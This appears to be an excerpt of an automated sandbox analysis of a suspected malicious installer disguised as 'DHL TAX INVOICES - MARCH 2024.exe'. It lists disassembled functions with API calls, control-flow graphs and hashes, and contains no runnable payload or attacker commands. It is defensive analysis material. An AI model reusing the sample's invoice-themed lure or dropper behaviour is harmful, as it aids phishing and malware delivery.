                                                              • Part of subcall function 00404277: SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055DC
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055F1
                                                            • ShowWindow.USER32(00000000), ref: 00405615
                                                            • ShowWindow.USER32(?,00000008), ref: 0040561A
                                                            • ShowWindow.USER32(00000008), ref: 00405664
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
                                                            • CreatePopupMenu.USER32 ref: 004056A9
                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
                                                            • GetWindowRect.USER32(?,?), ref: 004056DD
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
                                                            • OpenClipboard.USER32(00000000), ref: 0040573E
                                                            • EmptyClipboard.USER32 ref: 00405744
                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
                                                            • GlobalLock.KERNEL32(00000000), ref: 0040575A
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040578E
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405799
                                                            • CloseClipboard.USER32 ref: 0040579F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                            • String ID: (7B${
                                                            • API String ID: 4154960007-525222780
                                                            • Opcode ID: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                            • Instruction ID: 3349dadf3efb3a8fdffdb79f187be012afacb07b5928e089a4a7fd9dccbac2fd
                                                            • Opcode Fuzzy Hash: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                            • Instruction Fuzzy Hash: 60B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004061A0 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 545 4061a0-4061ab 546 4061ad-4061bc 545->546 547 4061be-4061d4 545->547 546->547 548 4061da-4061e7 547->548 549 4063ec-4063f2 547->549 548->549 550 4061ed-4061f4 548->550 551 4063f8-406403 549->551 552 4061f9-406206 549->552 550->549 554 406405-406409 call 40617e 551->554 555 40640e-40640f 551->555 552->551 553 40620c-406218 552->553 556 4063d9 553->556 557 40621e-40625a 553->557 554->555 559 4063e7-4063ea 556->559 560 4063db-4063e5 556->560 561 406260-40626b GetVersion 557->561 562 40637a-40637e 557->562 559->549 560->549 563 406285 561->563 564 40626d-406271 561->564 565 406380-406384 562->565 566 4063b3-4063b7 562->566 572 40628c-406293 563->572 564->563 569 406273-406277 564->569 570 406394-4063a1 call 40617e 565->570 571 406386-406392 call 4060c5 565->571 567 4063c6-4063d7 lstrlenW 566->567 568 4063b9-4063c1 call 4061a0 566->568 567->549 568->567 569->563 574 406279-40627d 569->574 583 4063a6-4063af 570->583 571->583 576 406295-406297 572->576 577 406298-40629a 572->577 574->563 579 40627f-406283 574->579 576->577 581 4062d6-4062d9 577->581 582 40629c-4062c2 call 40604b 577->582 579->572 586 4062e9-4062ec 581->586 587 4062db-4062e7 GetSystemDirectoryW 581->587 593 406361-406365 582->593 594 4062c8-4062d1 call 4061a0 582->594 583->567 585 4063b1 583->585 589 406372-406378 call 406412 585->589 591 406357-406359 586->591 592 4062ee-4062fc GetWindowsDirectoryW 586->592 590 40635b-40635f 587->590 589->567 590->589 590->593 591->590 595 4062fe-406308 591->595 592->591 593->589 598 406367-40636d lstrcatW 593->598 594->590 600 406322-406338 SHGetSpecialFolderLocation 595->600 601 40630a-40630d 595->601 598->589 604 406353 600->604 605 40633a-406351 SHGetPathFromIDListW CoTaskMemFree 600->605 601->600 603 40630f-406316 601->603 606 40631e-406320 603->606 604->591 605->590 605->604 606->590 606->600
                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,?,00405314,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000), ref: 00406263
                                                            • GetSystemDirectoryW.KERNEL32(ExecToStack,00000400), ref: 004062E1
                                                            • GetWindowsDirectoryW.KERNEL32(ExecToStack,00000400), ref: 004062F4
                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
                                                            • SHGetPathFromIDListW.SHELL32(?,ExecToStack), ref: 0040633E
                                                            • CoTaskMemFree.OLE32(?), ref: 00406349
                                                            • lstrcatW.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
                                                            • lstrlenW.KERNEL32(ExecToStack,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,?,00405314,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000), ref: 004063C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                            • String ID: ExecToStack$Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 900638850-2041451948
                                                            • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                            • Instruction ID: 57c77dc533264c97ace6329bd87f7d674c2bea75a5b3d90d15d675b8bae5a73d
                                                            • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                            • Instruction Fuzzy Hash: 1E611571A00104EBDF209F24CC40AAE37A5AF15314F56817FED56BA2D0D73D8AA2CB9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040596F Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 607 40596f-405995 call 405c3a 610 405997-4059a9 DeleteFileW 607->610 611 4059ae-4059b5 607->611 612 405b2b-405b2f 610->612 613 4059b7-4059b9 611->613 614 4059c8-4059d8 call 40617e 611->614 615 405ad9-405ade 613->615 616 4059bf-4059c2 613->616 620 4059e7-4059e8 call 405b7e 614->620 621 4059da-4059e5 lstrcatW 614->621 615->612 619 405ae0-405ae3 615->619 616->614 616->615 622 405ae5-405aeb 619->622 623 405aed-405af5 call 4064c1 619->623 624 4059ed-4059f1 620->624 621->624 622->612 623->612 630 405af7-405b0b call 405b32 call 405927 623->630 627 4059f3-4059fb 624->627 628 4059fd-405a03 lstrcatW 624->628 627->628 631 405a08-405a24 lstrlenW FindFirstFileW 627->631 628->631 647 405b23-405b26 call 4052dd 630->647 648 405b0d-405b10 630->648 633 405a2a-405a32 631->633 634 405ace-405ad2 631->634 635 405a52-405a66 call 40617e 633->635 636 405a34-405a3c 633->636 634->615 638 405ad4 634->638 649 405a68-405a70 635->649 650 405a7d-405a88 call 405927 635->650 639 405ab1-405ac1 FindNextFileW 636->639 640 405a3e-405a46 636->640 638->615 639->633 646 405ac7-405ac8 FindClose 639->646 640->635 643 405a48-405a50 640->643 643->635 643->639 646->634 647->612 648->622 651 405b12-405b21 call 4052dd call 40601f 648->651 649->639 652 405a72-405a7b call 40596f 649->652 660 405aa9-405aac call 4052dd 650->660 661 405a8a-405a8d 650->661 651->612 652->639 660->639 664 405aa1-405aa7 661->664 665 405a8f-405a9f call 4052dd call 40601f 661->665 664->639 665->639
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,00000000), ref: 00405998
                                                            • lstrcatW.KERNEL32(00425730,\*.*), ref: 004059E0
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405A03
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,74DF3420,74DF2EE0,00000000), ref: 00405A09
                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,74DF3420,74DF2EE0,00000000), ref: 00405A19
                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
                                                            • FindClose.KERNEL32(00000000), ref: 00405AC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$0WB$\*.*
                                                            • API String ID: 2035342205-1995485284
                                                            • Opcode ID: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
                                                            • Instruction ID: 6c547db7f4d1248ed83a6ec2b2b7cf99957869ea0eb35c9edb1a86952611c1c3
                                                            • Opcode Fuzzy Hash: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
                                                            • Instruction Fuzzy Hash: 5A41B530A40914A6CB21AB659CC9AAF7678EF41724F20427FF801711D1D77C5986DE6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406846 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                            • Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
                                                            • Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                            • Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004064C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(74DF3420,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0), ref: 004064CC
                                                            • FindClose.KERNEL32(00000000), ref: 004064D8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: xgB
                                                            • API String ID: 2295610775-399326502
                                                            • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                            • Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
                                                            • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                            • Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403D6A Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 298 403d6a-403d7c 299 403d82-403d88 298->299 300 403ebd-403ecc 298->300 299->300 301 403d8e-403d97 299->301 302 403f1b-403f30 300->302 303 403ece-403f16 GetDlgItem * 2 call 404242 SetClassLongW call 40140b 300->303 304 403d99-403da6 SetWindowPos 301->304 305 403dac-403daf 301->305 307 403f70-403f75 call 40428e 302->307 308 403f32-403f35 302->308 303->302 304->305 312 403db1-403dc3 ShowWindow 305->312 313 403dc9-403dcf 305->313 317 403f7a-403f95 307->317 309 403f37-403f42 call 401389 308->309 310 403f68-403f6a 308->310 309->310 331 403f44-403f63 SendMessageW 309->331 310->307 316 40420f 310->316 312->313 318 403dd1-403de6 DestroyWindow 313->318 319 403deb-403dee 313->319 324 404211-404218 316->324 322 403f97-403f99 call 40140b 317->322 323 403f9e-403fa4 317->323 325 4041ec-4041f2 318->325 327 403df0-403dfc SetWindowLongW 319->327 328 403e01-403e07 319->328 322->323 334 403faa-403fb5 323->334 335 4041cd-4041e6 DestroyWindow EndDialog 323->335 325->316 332 4041f4-4041fa 325->332 327->324 329 403eaa-403eb8 call 4042a9 328->329 330 403e0d-403e1e GetDlgItem 328->330 329->324 336 403e20-403e37 SendMessageW IsWindowEnabled 330->336 337 403e3d-403e40 330->337 331->324 332->316 339 4041fc-404205 ShowWindow 332->339 334->335 340 403fbb-404008 call 4061a0 call 404242 * 3 GetDlgItem 334->340 335->325 336->316 336->337 341 403e42-403e43 337->341 342 403e45-403e48 337->342 339->316 368 404012-40404e ShowWindow KiUserCallbackDispatcher call 404264 EnableWindow 340->368 369 40400a-40400f 340->369 345 403e73-403e78 call 40421b 341->345 346 403e56-403e5b 342->346 347 403e4a-403e50 342->347 345->329 349 403e91-403ea4 SendMessageW 346->349 351 403e5d-403e63 346->351 347->349 350 403e52-403e54 347->350 349->329 350->345 355 403e65-403e6b call 40140b 351->355 356 403e7a-403e83 call 40140b 351->356 366 403e71 355->366 356->329 365 403e85-403e8f 356->365 365->366 366->345 372 404050-404051 368->372 373 404053 368->373 369->368 374 404055-404083 GetSystemMenu EnableMenuItem SendMessageW 372->374 373->374 375 404085-404096 SendMessageW 374->375 376 404098 374->376 377 40409e-4040dc call 404277 call 40617e lstrlenW call 4061a0 SetWindowTextW call 401389 375->377 376->377 377->317 386 4040e2-4040e4 377->386 386->317 387 4040ea-4040ee 386->387 388 4040f0-4040f6 387->388 389 40410d-404121 DestroyWindow 387->389 388->316 390 4040fc-404102 388->390 389->325 391 404127-404154 CreateDialogParamW 389->391 390->317 392 404108 390->392 391->325 393 40415a-4041b1 call 404242 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 391->393 392->316 393->316 398 4041b3-4041c6 ShowWindow call 40428e 393->398 400 4041cb 398->400 400->325
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
                                                            • ShowWindow.USER32(?), ref: 00403DC3
                                                            • DestroyWindow.USER32 ref: 00403DD7
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
                                                            • GetDlgItem.USER32(?,?), ref: 00403E14
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403E2F
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403EDD
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403EE7
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F52
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FF8
                                                            • ShowWindow.USER32(00000000,?), ref: 00404019
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
                                                            • EnableWindow.USER32(?,?), ref: 00404046
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040405C
                                                            • EnableMenuItem.USER32(00000000), ref: 00404063
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040407B
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
                                                            • SetWindowTextW.USER32(?,00423728), ref: 004040CB
                                                            • ShowWindow.USER32(?,0000000A), ref: 004041FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: (7B
                                                            • API String ID: 3282139019-3251261122
                                                            • Opcode ID: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                            • Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
                                                            • Opcode Fuzzy Hash: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                            • Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004039C7 Relevance: 49.2, APIs: 14, Strings: 14, Instructions: 215stringregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 401 4039c7-4039df call 406558 404 4039e1-4039ec GetUserDefaultUILanguage call 4060c5 401->404 405 4039f3-403a2a call 40604b 401->405 408 4039f1 404->408 411 403a42-403a48 lstrcatW 405->411 412 403a2c-403a3d call 40604b 405->412 410 403a4d-403a76 call 403c9d call 405c3a 408->410 418 403b08-403b10 call 405c3a 410->418 419 403a7c-403a81 410->419 411->410 412->411 425 403b12-403b19 call 4061a0 418->425 426 403b1e-403b43 LoadImageW 418->426 419->418 420 403a87-403aaf call 40604b 419->420 420->418 427 403ab1-403ab5 420->427 425->426 429 403bc4-403bcc call 40140b 426->429 430 403b45-403b75 RegisterClassW 426->430 431 403ac7-403ad3 lstrlenW 427->431 432 403ab7-403ac4 call 405b5f 427->432 444 403bd6-403be1 call 403c9d 429->444 445 403bce-403bd1 429->445 433 403c93 430->433 434 403b7b-403bbf SystemParametersInfoW CreateWindowExW 430->434 438 403ad5-403ae3 lstrcmpiW 431->438 439 403afb-403b03 call 405b32 call 40617e 431->439 432->431 437 403c95-403c9c 433->437 434->429 438->439 443 403ae5-403aef GetFileAttributesW 438->443 439->418 448 403af1-403af3 443->448 449 403af5-403af6 call 405b7e 443->449 453 403be7-403c01 ShowWindow call 4064e8 444->453 454 403c6a-403c6b call 4053b0 444->454 445->437 448->439 448->449 449->439 461 403c03-403c08 call 4064e8 453->461 462 403c0d-403c1f GetClassInfoW 453->462 457 403c70-403c72 454->457 459 403c74-403c7a 457->459 460 403c8c-403c8e call 40140b 457->460 459->445 463 403c80-403c87 call 40140b 459->463 460->433 461->462 466 403c21-403c31 GetClassInfoW RegisterClassW 462->466 467 403c37-403c5a DialogBoxParamW call 40140b 462->467 463->445 466->467 471 403c5f-403c68 call 403917 467->471 471->437
                                                            APIs
                                                              • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                              • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000000), ref: 004039E1
                                                              • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                            • lstrcatW.KERNEL32(1033,00423728), ref: 00403A48
